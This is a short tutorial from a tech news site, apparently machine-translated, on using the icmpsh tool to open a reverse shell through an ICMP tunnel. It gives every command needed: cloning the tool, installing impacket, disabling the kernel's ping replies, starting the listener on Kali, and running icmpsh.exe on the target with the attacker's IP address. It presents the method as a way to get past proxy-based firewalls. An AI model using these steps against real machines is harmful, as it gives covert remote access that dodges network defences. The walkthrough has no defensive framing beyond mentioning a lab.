Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to use icmpsh to build icmp Tunnel bouncing shell

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article mainly introduces how to use icmpsh to build icmp tunnel rebound shell, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let Xiaobian take you to understand.

First install the icmpsh software on kali with the software address https://github.com/inquisb/icmpsh.git

We can clone git clone https://github.com/inquisb/icmpsh.git directly with git.

Then we need to install the python-impacket class library to ensure access to TCP, UDP, ICMP, etc.

Pip2 install impacket

Next we need to close our previous ping command responder to prevent the kernel from responding to the ping package itself.

Sysctl-w net.ipv4.icmp_echo_ignore_all=1

If you turn on the system ping after the experiment is completed, change the last 1 to 0.

Then you can start listening on kali.

Python icmpsh_m.py native ip target ip

And then transmit the icmpsh.exe to the target plane.

Icmpsh.exe-t 192.168.110.140-t is followed by the ip address of the attack plane and enter.

Shell received. Because the data is transmitted through the network layer using PING request / reply messages, there is no need to specify a service or port. This traffic cannot be detected by proxy-based firewalls, so this approach may bypass some firewall rules.

Thank you for reading this article carefully. I hope the article "how to use icmpsh to build icmp Tunnel rebound shell" shared by the editor will be helpful to everyone. At the same time, I also hope you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report